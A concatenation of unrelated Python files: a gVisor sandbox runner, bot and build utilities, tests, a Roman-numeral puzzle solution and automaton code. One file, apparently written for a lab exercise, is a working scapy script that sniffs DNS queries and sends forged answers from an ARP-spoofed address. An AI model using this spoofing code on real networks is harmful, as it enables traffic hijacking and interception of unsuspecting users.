                         # of the host with empty "tmpfs" mounts.
    },
    "hostname": "gristland",
    "mounts": mounts,
    "linux": {
        # Isolate the sandbox in fresh kernel namespaces.
        "namespaces": [
            {
                "type": "pid"
            },
            {
                "type": "network"
            },
            {
                "type": "ipc"
            },
            {
                "type": "uts"
            },
            {
                "type": "mount"
            }
        ]
    }
}
# Helper for preparing a mount.
def preserve(*locations, short_failure=False):
    """Bind-mount each of `locations` read-only into the sandbox.

    Raises if a location is missing on the host; `short_failure` selects a
    terser error message.
    """
    for loc in locations:
        # Check the requested directory is visible on the host, and that there hasn't been a
        # muddle. For Grist, this could happen if a parent directory of a temporary import
        # directory hasn't been made available to the container this code runs in, for example.
        if not os.path.exists(loc):
            message = 'cannot find: ' + loc
            if not short_failure:
                message += ' (if tmp path, make sure TMPDIR when running grist and GRIST_TMP line up)'
            raise Exception(message)
        mounts.append({
            "destination": loc,
            "source": loc,
            "options": ["ro"],
            "type": "bind"
        })
        preserved.add(loc)
# Prepare the file system - blank out everything that need not be shared.
exceptions = ["lib", "lib64"] # to be shared (read-only)
exceptions += ["proc", "sys"] # already virtualized
# retain /bin and /usr/bin for utilities
start = args.start
if include_bash or start:
    exceptions.append("bin")
    preserve("/usr/bin")
preserve("/usr/local/lib")
if os.path.exists('/lib64'):
    preserve("/lib64")
if os.path.exists('/usr/lib64'):
    preserve("/usr/lib64")
preserve("/usr/lib")
# include python3 for bash and python3
best = None  # resolved path of the python interpreter to run, if any
if not include_python2:
    # We expect python3 in /usr/bin or /usr/local/bin.
    candidates = [
        path
        # Pick the most generic python if not matching python3.9.
        # Sorry this is delicate because of restores, mounts, symlinks.
        for pattern in ['python3.9', 'python3', 'python3*']
        for root in ['/usr/local', '/usr']
        for path in glob.glob(f'{root}/bin/{pattern}')
        if os.path.exists(path)
    ]
    if not candidates:
        raise Exception('could not find python3')
    # realpath so we share the actual binary, not a symlink that would dangle.
    best = os.path.realpath(candidates[0])
    preserve(best)
# include python2 for bash and python2
if not include_python3:
    # Try to include python2 only if it is present or we were specifically asked for it.
    # This is to facilitate testing on a python3-only container.
    if os.path.exists("/usr/bin/python2.7") or include_python2:
        preserve("/usr/bin/python2.7", short_failure=True)
        best = "/usr/bin/python2.7"
        preserve("/usr/lib")
# Set up any specific shares requested.
if args.mount:
    preserve(*args.mount)
# Cover every top-level host directory that is not explicitly shared with an
# empty tmpfs mount, hiding it from the sandbox.
for directory in os.listdir('/'):
    if directory not in exceptions and ("/" + directory) not in preserved:
        mounts.insert(0, {
            "destination": "/" + directory,
            "type": "tmpfs" # This places an empty directory at this destination.
        })
# Set up faketime inside the sandbox if requested. Can't be set up outside the sandbox,
# because gvisor is written in Go and doesn't use the standard library that faketime
# tweaks.
if args.faketime:
    preserve('/usr/lib/x86_64-linux-gnu/faketime')
    # Run the target program under the faketime wrapper.
    cmd_args.append('faketime')
    cmd_args.append('-f')
    cmd_args.append('2020-01-01 00:00:00' if args.faketime == 'default' else args.faketime)
    preserve('/usr/bin/faketime')
    preserve('/bin/date')
# Pick and set an initial entry point (bash or python).
if start:
    cmd_args.append(start)
else:
    cmd_args.append('bash' if include_bash else best)
# Add any requested arguments for the program that will be run.
cmd_args += more_args
# Helper for assembling a runsc command.
# Takes the directory to work in and a list of arguments to append.
def make_command(root_dir, action):
    """Assemble a runsc invocation performing `action` for `root_dir`'s spec."""
    # Extra flags come from the environment, defaulting to rootless operation.
    extra_flags = (os.environ.get('GVISOR_FLAGS') or '-rootless').split(' ')
    container_name = root_dir.replace('/', '_')  # Derive an arbitrary container name.
    return (
        ["runsc",
         "-root", "/tmp/runsc"]  # Place container information somewhere writable.
        + extra_flags
        + ["-network", "none"]
        + action
        + [container_name]
    )
# Generate the OCI spec as config.json in a temporary directory, and either show
# it (if --dry-run) or pass it on to gvisor runsc.
with tempfile.TemporaryDirectory() as root: # pylint: disable=no-member
    config_filename = os.path.join(root, 'config.json')
    with open(config_filename, 'w') as fout:
        json.dump(settings, fout, indent=2)
    if args.dry_run:
        # Round-trip through the file so what we print is exactly what runsc
        # would read.
        with open(config_filename, 'r') as fin:
            spec = json.load(fin)
        print(json.dumps(spec, indent=2))
    else:
        if not args.checkpoint:
            # Normal run, optionally restoring from a checkpoint image.
            if args.restore:
                command = make_command(root, ["restore", "--image-path=" + args.restore])
            else:
                command = make_command(root, ["run"])
            result = subprocess.run(command, cwd=root) # pylint: disable=no-member
            if result.returncode != 0:
                raise Exception('gvisor runsc problem: ' + json.dumps(command))
        else:
            # We've been asked to make a checkpoint.
            # Start up the sandbox, and wait for it to emit a message on stderr ('Ready').
            command = make_command(root, ["run"])
            process = subprocess.Popen(command, cwd=root, stderr=subprocess.PIPE)
            ready_line = process.stderr.readline() # wait for ready
            sys.stderr.write('Ready message: ' + ready_line.decode('utf-8'))
            sys.stderr.flush()
            # Remove existing checkpoint if present.
            if os.path.exists(os.path.join(args.checkpoint, 'checkpoint.img')):
                os.remove(os.path.join(args.checkpoint, 'checkpoint.img'))
            # Make the directory, so we will later have the right to delete the checkpoint if
            # we wish to replace it. Otherwise there is a muddle around permissions.
            if not os.path.exists(args.checkpoint):
                os.makedirs(args.checkpoint)
            # Go ahead and run the runsc checkpoint command.
            # This is destructive, it will kill the sandbox we are checkpointing.
            command = make_command(root, ["checkpoint", "--image-path=" + args.checkpoint])
            result = subprocess.run(command, cwd=root) # pylint: disable=no-member
            if result.returncode != 0:
                raise Exception('gvisor runsc checkpointing problem: ' + json.dumps(command))
# We are done!
|
#
# Copyright (c) 2019 UAVCAN Development Team
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel.kirienko@zubax.com>
#
import sys
import typing
import dataclasses
@dataclasses.dataclass(frozen=True)
class TransportConfig:
    """CLI arguments selecting a transport, plus whether it can transmit."""
    cli_args: typing.Sequence[str]  # one '--tr=...' entry per (redundant) transport
    can_transmit: bool              # False for receive-only configs (e.g. anonymous UDP)
# Callable alias used by the factory generator below.
TransportFactory = typing.Callable[[typing.Optional[int]], TransportConfig]
"""
This factory constructs arguments for the CLI instructing it to use a particular transport configuration.
The factory takes one argument - the node-ID - which can be None (anonymous).
"""
def _make_transport_factories_for_cli() -> typing.Iterable[TransportFactory]:
    """
    Sensible transport configurations supported by the CLI to test against.
    Don't forget to extend when adding support for new transports.
    """
    if sys.platform == 'linux':
        # CAN via SocketCAN (Linux-only).
        yield lambda nid: TransportConfig(
            cli_args=(f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan0",64),local_node_id={nid})', ),
            can_transmit=True,
        )
        # Redundant CAN via SocketCAN
        yield lambda nid: TransportConfig(
            cli_args=(
                f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan0",8),local_node_id={nid})',
                f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan1",32),local_node_id={nid})',
                f'--tr=CAN(can.media.socketcan.SocketCANMedia("vcan2",64),local_node_id={nid})',
            ),
            can_transmit=True,
        )
    # Serial via TCP/IP tunnel (emulation)
    # Imported lazily so that merely importing this module does not pull in
    # the serial test fixtures.
    from tests.transport.serial import VIRTUAL_BUS_URI
    yield lambda nid: TransportConfig(
        cli_args=(f'--tr=Serial("{VIRTUAL_BUS_URI}",local_node_id={nid})', ),
        can_transmit=True,
    )
    # UDP/IP on localhost (cannot transmit if anonymous)
    # Note: the conditional is the lambda body, so the anonymous branch is
    # only evaluated when the factory is called with nid=None.
    yield lambda nid: TransportConfig(
        cli_args=(f'--tr=UDP("127.0.0.{nid}/8")', ),
        can_transmit=True,
    ) if nid is not None else TransportConfig(
        cli_args=('--tr=UDP("127.255.255.255/8")', ),
        can_transmit=False,
    )
    # Redundant UDP+Serial. The UDP transport does not support anonymous transfers.
    yield lambda nid: TransportConfig(
        cli_args=(
            f'--tr=Serial("{VIRTUAL_BUS_URI}",local_node_id={nid})',
            (f'--tr=UDP("127.0.0.{nid}/8")' if nid is not None else '--tr=UDP("127.255.255.255/8")'),
        ),
        can_transmit=nid is not None,
    )
# Materialized once at import time; each entry is a factory taking a node-ID.
TRANSPORT_FACTORIES = list(_make_transport_factories_for_cli())
|
from math import cos, sin
from typing import List
import bot.injector as injector
from bot.hooks import hookable
from sc2 import BotAI
from sc2.pixel_map import PixelMap
from sc2.position import Point2
from sc2.unit import Unit
from sc2.units import Units
class UnitObservation:
    """Tracks one enemy unit that may currently be out of vision.

    The observation expires after `time_to_live` iterations unless `permanent`
    (used for structures, which do not move).
    """
    def __init__(self, unit: Unit, time_to_live: int, permanent = False):
        self.bot: BotAI = injector.inject(BotAI)
        self.unit = unit
        self.time_to_live = time_to_live
        self.permanent = permanent
        # Game time of the last iterate() call; 0 means "not yet iterated".
        self.last_update = 0

    def iterate(self, time):
        """Advance one step; returns False when the observation should be forgotten."""
        # update unit position
        if self.last_update > 0 and self.unit.movement_speed > 0:
            # Dead-reckon where the unit could be now, assuming it kept moving
            # in the direction it was last seen facing.
            movement_amount = self.unit.movement_speed * (time - self.last_update)
            direction = Point2((cos(self.unit.facing), sin(self.unit.facing)))
            new_position = self.unit.position + movement_amount * direction
            a: PixelMap = self.bot._game_info.pathing_grid
            # Only accept extrapolated positions inside the map bounds that
            # the unit could actually occupy.
            if (
                new_position.x > 0 and new_position.x < a.width - 1 and
                new_position.y > 0 and new_position.y < a.height - 1 and
                (self.unit.is_flying or self.bot.in_pathing_grid(new_position))
            ):
                # Position extrapolation is deliberately disabled for now.
                # self.unit.set_position(new_position)
                pass
        self.last_update = time
        if self.permanent:
            return True
        self.time_to_live = self.time_to_live - 1
        # NOTE(review): an initial ttl <= 0 would never reach exactly 0 here
        # and thus never expire; callers currently pass a positive ttl.
        if self.time_to_live == 0:
            return False
        return True

    def update_ttl(self, time_to_live: int):
        # Refresh the expiry countdown (called when the unit is seen again).
        self.time_to_live = time_to_live

    def update_unit(self, unit: Unit):
        # Replace the stored snapshot with a fresher Unit object.
        self.unit = unit
@hookable
class UnitMemory:
    """Remembers enemy units after they leave vision, with per-unit expiry."""
    def __init__(self, bot):
        self.bot: BotAI = bot
        # One observation per remembered enemy unit.
        self.unit_observations: List[UnitObservation] = []
        # Snapshot of all remembered enemy units, rebuilt by iterate().
        self.observed_enemy_units: Units =Units([])

    def iterate(self, time):
        """Refresh observations from visible enemies and drop expired ones."""
        # Update unit observations based on known enemy units
        ttl = 240  # iterations a unit stays remembered after it was last seen
        for unit in self.bot.known_enemy_units:
            updated = False
            for observation in self.unit_observations:
                if observation.unit.tag == unit.tag:
                    observation.update_unit(unit)
                    observation.update_ttl(ttl)
                    updated = True
            if not updated and unit.is_visible:
                # Structures never move, so remember them permanently.
                if unit.is_structure:
                    self.unit_observations.append(UnitObservation(unit, ttl, True))
                else:
                    self.unit_observations.append(UnitObservation(unit, ttl))
        # Update observed_enemy_units then remove old observations
        # NOTE(review): units are appended to `temp` before the expiry check,
        # so a unit expiring this tick still appears in observed_enemy_units
        # until the next call -- confirm this is intended.
        temp: Units =Units([])
        to_remove = []
        for observation in self.unit_observations:
            temp.append(observation.unit)
            if not observation.iterate(time):
                # forget unit if observation has expired or there's a friendly unit in vision range but the enemy unit can't be seen
                to_remove.append(observation)
            elif not self.bot.known_enemy_units.find_by_tag(observation.unit.tag) and self.bot.is_visible(observation.unit.position):
                # Relocating units that should be visible but aren't is
                # deliberately disabled for now.
                # observation.unit.set_position(self.bot.enemy_start_locations[0])
                pass
        for observation in to_remove:
            self.unit_observations.remove(observation)
        self.observed_enemy_units: Units = Units(temp)

    def on_unit_destroyed(self, tag: str):
        """Drop any observation matching the destroyed unit's tag."""
        to_remove = []
        for observation in self.unit_observations:
            observation: UnitObservation
            if observation.unit.tag == tag:
                to_remove.append(observation)
        for observation in to_remove:
            self.unit_observations.remove(observation)
|
import os
import setuptools
import versioneer
LOCAL_DIR = os.path.dirname(os.path.abspath(__file__))


def read_requirements(path="requirements.txt"):
    """Read a pip requirements file and return its entries as a list of strings.

    `path` is resolved relative to this setup.py (an absolute path is used
    as-is by os.path.join). Returns an empty list when the file is missing.
    Entries are whitespace-stripped; blank lines and comment lines are
    skipped. Fixes two filtering bugs in the previous version: blank lines
    produced empty-string entries, and indented comments slipped past the
    `startswith("#")` check because stripping happened after the filter.
    """
    full_path = os.path.join(LOCAL_DIR, path)
    if not os.path.exists(full_path):
        return []
    with open(full_path) as fid:
        stripped = (line.strip() for line in fid)
        return [line for line in stripped if line and not line.startswith("#")]
requirements = read_requirements()
print(requirements)
# test_requirements = read_requirements(path="requirements_test.txt")
setuptools.setup(
    version=versioneer.get_version(),
    cmdclass=versioneer.get_cmdclass(),
    name="UMich Controls - Python",
    description="GCode",
    license="BSD",
    packages=setuptools.find_packages(),
    zip_safe=False,
    # BUG FIX: was hard-coded to [], which silently discarded the
    # requirements parsed above; pass them through so pip installs them.
    install_requires=requirements,
    include_package_data=True,
)
|
import torch
from xallennlp.modules.span_extractors import PoolingSpanExtractor
def test_pooling_span_extractor() -> None:
    """PoolingSpanExtractor output shape checks, with and without width embeddings."""
    # Basic extraction: output keeps the input feature dimension.
    sequence = torch.rand((2, 4, 5))
    span_indices = torch.LongTensor([[[0, 2], [1, 1]], [[1, 2], [2, 3]]])
    basic = PoolingSpanExtractor(input_dim=5)
    assert basic(sequence, span_indices).size() == (2, 2, 5)
    # With span-width embeddings, the width embedding dim is concatenated.
    sequence = torch.rand((2, 4, 5))
    span_indices = torch.LongTensor([[[0, 2], [1, 1]], [[1, 2], [2, 3]]])
    with_width = PoolingSpanExtractor(input_dim=5, num_width_embeddings=4, span_width_embedding_dim=3)
    assert with_width(sequence, span_indices).size() == (2, 2, 5 + 3)
|
# xpyBuild - eXtensible Python-based Build System
#
# This module holds definitions that are used throughout the build system, and
# typically all names from this module will be imported.
#
# Copyright (c) 2019 Software AG, Darmstadt, Germany and/or its licensors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Id: buildcommon.py 301527 2017-02-06 15:31:43Z matj $
#
""" Utility functions for manipulating strings, such as
`xpybuild.utils.stringutils.compareVersions`.
"""
import traceback, os, sys, io
import re
import platform
import logging
def compareVersions(v1: str, v2: str) -> int:
	""" Compares two alphanumeric dotted version strings to see which is more recent.

	The comparison ignores case and normalizes the separators ./-/_ so that
	`'1.alpha2'=='1Alpha2'`. String components compare lexicographically with
	other strings; compared to numbers, strings are always considered greater.

	@param v1: A string containing a version number, with any number of components.
	@param v2: A string containing a version number, with any number of components.
	@return: an integer > 0 if v1>v2, an integer < 0 if v1<v2, or 0 if they
	are semantically the same.

	>>> compareVersions('10-alpha5.dev10', '10alpha-5-dEv_10') == 0
	True
	>>> compareVersions('1.2.0', '1.2')
	0
	>>> compareVersions('1.2', '1.2.3')
	-1
	>>> compareVersions('1.2.text', '1.2.0') # letters are > numbers
	1
	>>> compareVersions('', '')
	0
	"""
	def _components(ver):
		# Normalize into a list of components, integers for the numeric bits.
		parts = re.split('([0-9]+|[.])', ver.lower().replace('-', '.').replace('_', '.'))
		return [int(p) if p.isdigit() else p for p in parts if p and p != '.']

	a = _components(v1)
	b = _components(v2)
	# Pad the shorter list with zeros so both have equal length.
	if len(a) < len(b):
		a += [0] * (len(b) - len(a))
	else:
		b += [0] * (len(a) - len(b))
	for x, y in zip(a, b):
		if isinstance(x, int) != isinstance(y, int):
			# Mixed types cannot use >; define string > int.
			return 1 if isinstance(y, int) else -1
		if x != y:
			return 1 if x > y else -1
	return 0
def formatTimePeriod(secs):
	"""
	Format a time period to a short display string.

	>= 2 minutes renders as fractional minutes, >= 10 s as whole seconds,
	anything shorter as fractional seconds.
	"""
	if secs >= 120:
		return '%0.1f minutes' % (secs / 60.0)
	if secs >= 10:
		return '%d seconds' % secs
	return '%0.1f seconds' % secs
|
#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid
import datetime
import time
# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr: uuid.getnode() returns the hardware address as a 48-bit int;
# extract each byte, hex-format it, and join the octets in network order.
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0, 8 * 6, 8)][::-1])
# destination ip we arp spoofed (not this host's real address)
ipaddr_we_arp_spoofed = "10.6.6.53" ## see arp-resp.py
def handle_dns_request(packet):
    """Forge a DNS answer for *packet* resolving the queried name to our own IP.

    The response is sent from the ARP-spoofed source address so the victim
    believes the real resolver answered.  The hard-coded MAC/IP values below
    must be edited for the target network (see comments).
    """
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    req_udp = packet[UDP]
    # NOTE(review): eth is built but unused — the Ether layer is not needed
    # when sending at layer 3 (see the commented-out line below).
    eth = Ether(src=macaddr, dst="4c:24:57:ab:ed:84")  # need to replace mac addresses
    ip = IP(dst="10.6.6.35", src=ipaddr_we_arp_spoofed)  # need to replace IP addresses
    # Swap ports: answer returns to the client's ephemeral source port from 53.
    udp = UDP(dport=req_udp.sport, sport=53)
    req_dns = packet[DNS]  # need to replace ports
    dns = DNS(
        qr=1,  # response flag
        rd=1,
        id=req_dns.id,  # echo the query id so the client accepts the answer
        qd=req_dns.qd,  # echo the question section
        an=DNSRR(rrname=req_dns.qd.qname, ttl=5, rdata=str(ipaddr))
    )
    # dns_response = eth / ip / udp / dns # eth wrapping is not needed at DNS level
    dns_response = ip / udp / dns  # without the DNS wrapping
    dns_response.show()
    send(dns_response)
# def pranshu_dns_request(packet):
# time = datetime.datetime.now()
# if packet.haslayer(UDP):
# print(packet.src)
# print(packet[DNS])
# print(packet[DNS].id)
# print(packet[DNS].qr)
# print(packet[DNS].rd)
# print(packet[DNS].rcode)
# print(packet[DNSQR].qname)
# def read_packet():
# packets = rdpcap("../pcaps/dns.pcap")
# for packet in packets:
# print(packet.show())
def main():
    """Sniff eth0 for DNS queries and answer each one with a forged response."""
    # Strict BPF filter: only queries addressed to the spoofed IP and our MAC.
    # NOTE(review): built but unused — the looser filter below is what sniff() gets.
    berkeley_packet_filter = " and ".join([
        "udp dst port 53",  # dns
        "udp[10] & 0x80 = 0",  # dns request
        "dst host {}".format(ipaddr_we_arp_spoofed),  # destination ip we had spoofed (not our real ip)
        "ether dst host {}".format(macaddr)  # our macaddress since we spoofed the ip to our mac
    ])
    pranshu_packet_filter = "udp dst port 53"  # my filter is a lot less rigid
    # sniff the eth0 int without storing packets in memory and stopping after one dns request
    # NOTE(review): no count= argument is given, so despite the comment above
    # sniffing never stops after one request.
    sniff(filter=pranshu_packet_filter, prn=handle_dns_request, store=0, iface="eth0")
    # sniff(filter=pranshu_packet_filter, prn=pranshu_dns_request, store=0, iface="eth0", count=1)
if __name__ == "__main__":
    main()
# coding=utf-8
"""
Problem 89
18 February 2005
For a number written in Roman numerals to be considered valid there are basic rules which must be followed.
Even though the rules allow some numbers to be expressed in more than one way there is always a "best" way
of writing a particular number.
For example, it would appear that there are at least six ways of writing the number sixteen:
IIIIIIIIIIIIIIII
VIIIIIIIIIII
VVIIIIII
XIIIIII
VVVI
XVI
However, according to the rules only XIIIIII and XVI are valid, and the last example is considered to be the most
efficient, as it uses the least number of numerals.
The 11K text file, roman.txt (right click and 'Save Link/Target As...'), contains one thousand numbers written in
valid, but not necessarily minimal, Roman numerals; see About... Roman Numerals for the definitive rules for
this problem.
Find the number of characters saved by writing each of these in their minimal form.
Note: You can assume that all the Roman numerals in the file contain no more than four consecutive identical units.
----------------------------------------------------------
Created on 10.02.2015
@author: ahallmann
"""
import unittest
import timeit
# Value of each Roman numeral symbol.
mapping = {
    'I': 1,
    'V': 5,
    'X': 10,
    'L': 50,
    'C': 100,
    'D': 500,
    'M': 1000
}
# Symbols ordered from largest to smallest value.
order = ['M', 'D', 'C', 'L', 'X', 'V', 'I']
def read_numerals(filename):
    """Read one Roman numeral per line from *filename*, stripped of whitespace.

    FIX: use a context manager so the file is closed even if reading raises
    (the previous open/close pair leaked the handle on error), and iterate
    the file lazily instead of materializing readlines().
    """
    with open(filename, 'r') as f:
        return [line.strip() for line in f]
def format_roman_numeral(n):
    """Return the minimal Roman-numeral representation of n ('' for n <= 0).

    Walks the symbols from largest to smallest; before emitting a symbol it
    checks whether a subtractive prefix (IV, IX, XL, XC, CD, CM) applies, in
    which case the smaller symbol is emitted and its value *added* to n so
    the following division swallows it again.
    """
    global mapping, order
    # Largest numeral each symbol may be subtracted from: I from <=X, X from <=C, C from <=M.
    sub_numerals = {'I': 10, 'X': 100, 'C': 1000}
    s = ''
    number_index = 0
    while number_index < len(order):
        numeral_char = order[number_index]
        numeral_value = mapping[numeral_char]
        for sub_char in sub_numerals:
            sub_value = mapping[sub_char]
            # Subtractive case, e.g. n=900 at 'M': emit 'C' and bump n to 1000.
            if 1 <= numeral_value - sub_value <= n < numeral_value <= sub_numerals[sub_char]:
                s += sub_char
                n += sub_value
        if n >= numeral_value:
            # BUG FIX: was `n / numeral_value`, which is float division under
            # Python 3 and makes `str * float` raise TypeError; integer
            # division is intended.
            s += numeral_char * (n // numeral_value)
            n %= numeral_value
            if n <= 0:
                break
            # Re-examine the same symbol: the remainder may now take a
            # subtractive prefix of it (e.g. 999 left after emitting 'MMMM').
            number_index -= 1
        number_index += 1
    return s
def format_roman_numeral_old(number):
    """Return the minimal Roman numeral for *number* ('' for number <= 0).

    Greedy table-driven formatting: repeatedly emit the largest value
    (including the subtractive pairs CM, CD, XC, XL, IX, IV) that still fits.
    """
    pieces = []
    for value, symbol in ((1000, 'M'), (900, 'CM'), (500, 'D'), (400, 'CD'),
                          (100, 'C'), (90, 'XC'), (50, 'L'), (40, 'XL'),
                          (10, 'X'), (9, 'IX'), (5, 'V'), (4, 'IV'), (1, 'I')):
        while number >= value:
            pieces.append(symbol)
            number -= value
    return ''.join(pieces)
def parse_roman_numeral(numeral):
    """Parse a Roman-numeral string into its integer value.

    Subtractive notation is handled by rank: whenever a higher-valued symbol
    follows a lower-valued one, the lower symbol's value is retracted twice
    (once because it was already added, once for the subtraction).

    Raises ValueError for characters outside MDCLXVI.
    """
    global mapping, order
    total = 0
    previous_rank = -1
    for symbol in numeral:
        if symbol not in mapping:
            raise ValueError("unknown char: " + symbol)
        rank = order.index(symbol)
        if rank < previous_rank:
            # Strictly larger symbol after a smaller one -> subtractive pair.
            total -= mapping[order[previous_rank]] * 2
        previous_rank = rank
        total += mapping[symbol]
    return total
def optimize_roman_numeral(numeral):
    """Re-encode *numeral* in minimal form: parse it to an int, format it back."""
    value = parse_roman_numeral(numeral)
    return format_roman_numeral(value)
def solve():
    """Total characters saved by minimising every numeral in the data file."""
    return sum(len(numeral) - len(optimize_roman_numeral(numeral))
               for numeral in read_numerals("data/problem089.txt"))
class Test(unittest.TestCase):
    """Unit tests for the Roman-numeral helpers."""

    def test_samples(self):
        # Canonical minimal numeral -> integer value.
        numeral_to_value = {
            'I': 1, 'II': 2, 'IV': 4, 'XVI': 16, 'XIX': 19, 'XLIX': 49,
            'XL': 40, 'XC': 90, 'XCV': 95, 'CD': 400, 'CM': 900,
            'MMMMDXCV': 4595, 'MMMMCMXCIX': 4999,
        }
        for numeral, value in numeral_to_value.items():
            self.assertEqual(numeral, format_roman_numeral(value))

    def test_parse_format_compatibility(self):
        # format then parse is the identity on 0..4999.
        for value in range(5000):
            self.assertEqual(value, parse_roman_numeral(format_roman_numeral(value)))

    def test_old_new_compatibility(self):
        # The table-free implementation agrees with the general one.
        for value in range(5000):
            self.assertEqual(format_roman_numeral_old(value), format_roman_numeral(value))

    def test_answer(self):
        self.assertEqual(743, solve())
# -----------------------------------------
def run():
    """Entry point used by the (commented-out) timing harness below."""
    return solve()
if __name__ == '__main__':
    unittest.main()
# if __name__ == '__main__':
# t = timeit.Timer("run()", "from __main__ import run")
# count = 1
# print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
|
import PyCmdMessenger
import threading
import time
# Serial connection settings for the Arduino link.
SERIAL_PORT = "/dev/cu.usbmodem1421"
BAUD_RATE = 9600
# NOTE(review): the board is opened at import time, so importing this module
# requires the serial device to be present.
ARDUINO_INTERFACE = PyCmdMessenger.ArduinoBoard(SERIAL_PORT, baud_rate=BAUD_RATE)
# CmdMessenger protocol table: [command name, argument format] pairs
# (presumably "" = no payload, "s" = string, "i" = integer — confirm against
# the PyCmdMessenger docs).
MESSENGER_COMMANDS = [["get_rocket_location", ""],
                      ["rocket_location_response", "s"],
                      ["send_rocket_command", "i"],
                      ["rocket_command_response", "s"],
                      ["error", "s"]]
MESSENGER = PyCmdMessenger.CmdMessenger(ARDUINO_INTERFACE, MESSENGER_COMMANDS)
class PyCmdMessenger(threading.Thread):
    """Background thread that polls the rocket's location over serial and
    publishes it onto *server* as .lat/.lng.

    NOTE(review): this class shadows the imported ``PyCmdMessenger`` module —
    any later use of the module name in this file would resolve to the class.
    Consider renaming it (callers permitting).
    """
    def __init__(self, threadID, name, server):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.server = server  # object whose .lat/.lng attributes are updated
    def run(self):
        # Poll forever; there is no sleep, so pacing relies on the blocking
        # serial receive.
        while True:
            MESSENGER.send("get_rocket_location")
            response = MESSENGER.receive()
            # response[1] is the argument list; its first entry is the location
            # string — presumably "lat,lng"; confirm against the firmware.
            location = response[1][0]
            # Clean "/." artifacts from the string, then split lat from lng.
            formatted_string = location.replace("/.", ".").split(",")
            formatted_location = list(map(float, formatted_string))
            self.server.lat = formatted_location[0]
            self.server.lng = formatted_location[1]
|
from PDA import PDA
import math
# Sentinel for epsilon (empty) input/stack symbols used throughout this module.
EMPTY_STRING = ''
def int_to_bin(x):
    """Return x's binary representation without the '0b' prefix."""
    return format(x, 'b')
def s_2(x):
    """Binary digit sum of x: the number of 1-bits in its binary representation."""
    return format(x, 'b').count('1')
def base_b(n,b):
s = EMPTY_STRING
while n > 0:
s += str(n % b)
n //= b
return s[::-1]
def s_b(n, b):
    """Base-b digit sum of n (0 for n <= 0)."""
    total = 0
    while n > 0:
        n, digit = divmod(n, b)
        total += digit
    return total
# def is_k_flimsy(x, k):
# return s_2(x) > s_2(k*x)
# def find_first_k_flimsy_numbers (k, limit): # Finds the k-flimsy integers in [1..limit]
# output = []
# for i in range (1, limit):
# if (is_k_flimsy(i,k)):
# output.append(i)
# return output
def create_palindrome_PDA():
    """PDA for palindromes over {a, b}, odd or even length.

    'S' pushes each symbol; the midpoint is guessed nondeterministically
    (the ('END', ...) alternatives consume one unmatched middle symbol for
    odd lengths), then 'END' pops one matching symbol per input symbol.
    Acceptance is presumably by empty stack after the 'Z' bottom marker is
    popped — confirm against the PDA class.
    """
    states = {'S', 'END'}
    alphabet = {'', 'a', 'b'}
    stack_alphabet = {'Z', 'a', 'b'}
    start_state = 'S'
    start_stack = 'Z'
    transitions = {
        # Push phase; second alternative skips one middle symbol (odd length).
        ('S', 'a', 'Z'): [('S', 'aZ'), ('END', 'Z')],
        ('S', 'a', 'a'): [('S', 'aa'), ('END', 'a')],
        ('S', 'a', 'b'): [('S', 'ab'), ('END', 'b')],
        ('S', 'b', 'Z'): [('S', 'bZ'), ('END', 'Z')],
        ('S', 'b', 'a'): [('S', 'ba'), ('END', 'a')],
        ('S', 'b', 'b'): [('S', 'bb'), ('END', 'b')],
        # Epsilon moves to the pop phase (even length).
        ('S', '', 'Z'): [('END', 'Z')],
        ('S', '', 'a'): [('END', 'a')],
        ('S', '', 'b'): [('END', 'b')],
        # Pop phase: match input against the stack; drop the bottom marker.
        ('END', '', 'Z'): [('END', '')],
        ('END', 'a', 'a'): [('END', '')],
        ('END', 'b', 'b'): [('END', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_even_palindrome_PDA():
    """PDA for even-length palindromes over {a, b}.

    Same as create_palindrome_PDA but without the moves that consume an
    unmatched middle symbol, so only even lengths can match.
    """
    states = {'S', 'END'}
    alphabet = {'', 'a', 'b'}
    stack_alphabet = {'Z', 'a', 'b'}
    start_state = 'S'
    start_stack = 'Z'
    transitions = {
        # Push phase.
        ('S', 'a', 'Z'): [('S', 'aZ')],
        ('S', 'a', 'a'): [('S', 'aa')],
        ('S', 'a', 'b'): [('S', 'ab')],
        ('S', 'b', 'Z'): [('S', 'bZ')],
        ('S', 'b', 'a'): [('S', 'ba')],
        ('S', 'b', 'b'): [('S', 'bb')],
        # Epsilon-guess of the midpoint.
        ('S', '', 'Z'): [('END', 'Z')],
        ('S', '', 'a'): [('END', 'a')],
        ('S', '', 'b'): [('END', 'b')],
        # Pop phase.
        ('END', '', 'Z'): [('END', '')],
        ('END', 'a', 'a'): [('END', '')],
        ('END', 'b', 'b'): [('END', '')]
    }
    return PDA(states, alphabet, stack_alphabet, start_state, start_stack, transitions)
def create_even_palindrome_PDA_alternate():
    """Alternative even-palindrome PDA with an explicit final state.

    q_0 pushes, q_1 pops while matching the second half, and q_2 is reached
    only by popping the 'Z' bottom marker once the stack is otherwise empty.
    """
    states = {'q_0', 'q_1', 'q_2'}
    alphabet = {'a', 'b', ''}
    stack_alphabet = {'Z', 'a', 'b'}
    start_state = 'q_0'
    start_stack = 'Z'
    transitions = {
        # Push phase.
        ('q_0', 'a', 'Z'): [('q_0', 'aZ')],
        ('q_0', 'a', 'a'): [('q_0', 'aa')],
        ('q_0', 'a', 'b'): [('q_0', 'ab')],
        ('q_0', 'b', 'Z'): [('q_0', 'bZ')],
        ('q_0', 'b', 'a'): [('q_0', 'ba')],
        ('q_0', 'b', 'b'): [('q_0', 'bb')],
        # Epsilon-guess of the midpoint.
